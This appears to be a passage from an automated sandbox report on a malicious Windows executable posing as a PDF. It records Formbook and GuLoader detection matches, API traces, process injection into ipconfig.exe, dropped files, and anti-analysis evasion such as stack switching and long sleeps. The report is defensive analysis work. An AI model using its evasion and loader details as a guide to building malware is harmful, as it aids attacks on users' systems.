        Source: 00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.25177336762.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal96.troj.evad.winEXE@5/9@1/1
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_00404991 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404991
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021AF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeFile created: C:\Users\user\polaritetsJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nst8DC1.tmpJump to behavior
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeReversingLabs: Detection: 28%
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeFile read: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeProcess created: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeProcess created: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23586816547.0000000002888000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23587200936.0000000002825000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23586816547.0000000002888000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23587200936.0000000002825000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23538857603.00000000329BA000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23534901660.0000000032809000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.25177584888.000000000373D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.23628480163.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.23631787063.0000000003461000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.25177584888.0000000003610000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23538857603.00000000329BA000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23534901660.0000000032809000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.25177584888.000000000373D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.23628480163.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.23631787063.0000000003461000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.25177584888.0000000003610000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000001.23351565531.0000000000649000.00000020.00000001.01000000.00000005.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.23445073146.0000000004F3C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.23628490729.000000000170C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_701D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_701D1BFF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_701D30C0 push eax; ret 0_2_701D30EE
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B621AD pushad ; retf 0004h2_2_32B6223F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B697A1 push es; iretd 2_2_32B697A8
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B908CD push ecx; mov dword ptr [esp], ecx2_2_32B908D6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_3289D2A3 pushfd ; ret 2_2_3289D2BE
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_328A5212 push eax; ret 2_2_328A5214
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_3289D25C pushad ; retf 2_2_3289D276
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_3289D26D pushad ; retf 2_2_3289D276
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_3289527D pushfd ; iretd 2_2_328952A0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_3289C825 pushfd ; retf 2_2_3289C847

        Persistence and Installation Behavior

        barindex
        Uses ipconfig to lookup or modify the Windows network settings
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeAPI/Special instruction interceptor: Address: 5640748
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeAPI/Special instruction interceptor: Address: 1E10748
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeAPI/Special instruction interceptor: Address: 7FF84D730594
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeAPI/Special instruction interceptor: Address: 7FF84D72FF74
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeAPI/Special instruction interceptor: Address: 7FF84D72D6C4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeAPI/Special instruction interceptor: Address: 7FF84D72D864
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF84D72D144
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF84D730594
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF84D72D764
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF84D72D324
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF84D72D364
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF84D72D004
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF84D72FF74
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF84D72D6C4
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF84D72D864
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1763 rdtsc 2_2_32BD1763
        Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 894Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 865Jump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeAPI coverage: 0.4 %
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1112Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1112Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1112Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1112Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23587200936.000000000280E000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23535926869.000000000280C000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000003.23536524033.000000000280C000.00000004.00000020.00020000.00000000.sdmp, D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, 00000002.00000002.23632177685.000000000280E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
